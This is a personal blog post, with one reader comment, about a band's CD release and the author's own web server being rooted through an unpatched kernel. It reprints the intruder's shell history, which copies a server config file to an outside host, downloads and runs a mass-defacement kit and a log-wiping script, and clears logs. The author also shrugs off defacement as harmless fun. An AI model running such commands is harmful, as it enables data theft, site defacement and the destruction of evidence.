Open your eyes, Everybody.. it’s always the right time..

Well, a day of good and bad spots.

First of all, let me just say, the U.S.E. CD release party _rocked_! I realize very few of my friends list lives in Seattle, and of those who do, most wouldn’t ever do anything as peblean as listening to U.S.E., but I don’t care. It rocked. If you like the B-52s, or 80s pop in general, their CD is well worth the $12. Those of you not in the SeaTac area can buy it at their web site.

No, they’re not paying me to plug them. 😉 They’re just really good. And their music has hope – something that I’ve been missing. 😉

Anyway, second of all, Curious warned me and I was a bad Sheer and didn’t listen.. the kernel on sheer.us had two known paths to root from nonpriv’d users.. and I got owned, by
aarkan@rachacuca.homelinux.com.

A excerpt of the .bash_history, for those of you who like such things, is below:

who
ps aux
cd /usr/local/apache/conf
ls
who
ftp ftp.grupong.v10.com.br
ftp ftp.grupong.v10.com.br
ftp rachacuca.homelinux.com
ftp rachacuca.homelinux.com
scp httpd.conf aarkan@rachacuca.homelinux.com
scp httpd.conf aarkan@rachacuca.homelinux.com:/home/aarkan
cd
cd /root
cd .ssh
ls
rm know_hosts
cat /dev/null > known_hosts
cd /tmp
cd /home
ls
cd kenny
ls
cd ..
ls
cd netlogin
ls
cd ..
lls
ls
cd
cd /
mkdir mass
cd mass
wget www.geocities.com/xferror/mass.tgz
wget rachacuca.homelinux.com/NG/index.html
uname -a
wget rachacuca.homelinux.com/NG/index.html
rm index.html
mv index.html.1 index.kmg
tar zxvf mass.tgz
./mass /home
chmod 777 mass
chmod 777 mass2
chmod 777 mass3
cd /usr/local/apache/logs
ls
cat /dev/null > *
ls -l
cd /mass
wget rachacuca.homelinux.com/NG/limpalog.sh
chmod 777 limpalog.sh
./limpalog.sh /usr/local/apache/logs
ls -l /usr/local/apache/logs
./limpalogs.sh /var/logs
./limpalog.sh /var/log
./limpalog.sh /var/log/httpd
./mass /home
./mass1 /home
./mass2 /home
./mass3 /home
rm brk2.zip
rm bind.zip
rm -rf /mass

Anyway, normally I’d be completely cool with this – but he didn’t leave the old index.html’s renamed, so I’m somewhat annoyed at him.

Look, security can be a game of chess, fun for both sides – or it can be a war, involving cops and thugs and jail time and stuff. If no damage is done, it’s a lot more likely to stay the former – fun for everyone.

Hackers, ALWAYS back up waht you deface. Luckily, the wayback machine had most of what was lost (I hadn’t done a backup in forever. Bad sheer number 2.. )

Anyway, so right now I’m slowly progressing through the PITA of upgrading every potentially vulnerable service..

One Response to “Open your eyes, Everybody.. it’s always the right time..”

  1. jcurious Says:

    yea.. I’m doin’ bad in the backup department too.. btw were you able to recover limpalog.sh, brk2.zip and bind.zip?
    how is upgrading a pain in the ass?
    just do:
    apt-get update ; apt-get upgrade

    errr.. unless your not running debian..

    seriously.. I’m sorry to hear you got hacked.. from the looks of it… it could have been much worse..
    judging from the file sizes in your log directories.. it seems as though syslog was never killed 😉

    doesn’t seem like it’s someone who knew what they were doing..
    shrugs

Leave a Reply